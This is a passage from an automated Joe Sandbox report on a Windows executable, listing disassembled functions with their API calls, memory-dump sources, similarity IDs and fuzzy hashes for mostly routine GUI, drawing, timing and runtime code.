                                                                                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                • SendMessageW.USER32 ref: 00471AE3
                                                                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                • String ID:
                                                                                                • API String ID: 3611059338-0
                                                                                                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                • String ID:
                                                                                                • API String ID: 1640429340-0
                                                                                                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • _wcslen.LIBCMT ref: 004438CD
                                                                                                • _wcslen.LIBCMT ref: 004438E6
                                                                                                • _wcstok.LIBCMT ref: 004438F8
                                                                                                • _wcslen.LIBCMT ref: 0044390C
                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                • _wcstok.LIBCMT ref: 00443931
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 3632110297-0
                                                                                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                • String ID:
                                                                                                • API String ID: 752480666-0
                                                                                                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                • String ID:
                                                                                                • API String ID: 3275902921-0
                                                                                                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                • String ID:
                                                                                                • API String ID: 3275902921-0
                                                                                                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                • String ID:
                                                                                                • API String ID: 2833360925-0
                                                                                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32 ref: 004555C7
                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3691411573-0
                                                                                                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                • EndPath.GDI32(?), ref: 004472D6
                                                                                                • StrokePath.GDI32(?), ref: 004472E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                • String ID:
                                                                                                • API String ID: 372113273-0
                                                                                                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDevice$Release
                                                                                                • String ID:
                                                                                                • API String ID: 1035833867-0
                                                                                                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 0041708E
                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                • __lock.LIBCMT ref: 004170BE
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                • _free.LIBCMT ref: 004170EE
                                                                                                • InterlockedIncrement.KERNEL32(00952D90), ref: 00417106
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                • String ID:
                                                                                                • API String ID: 3470314060-0
                                                                                                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3495660284-0
                                                                                                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual
                                                                                                • String ID:
                                                                                                • API String ID: 4278518827-0
                                                                                                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
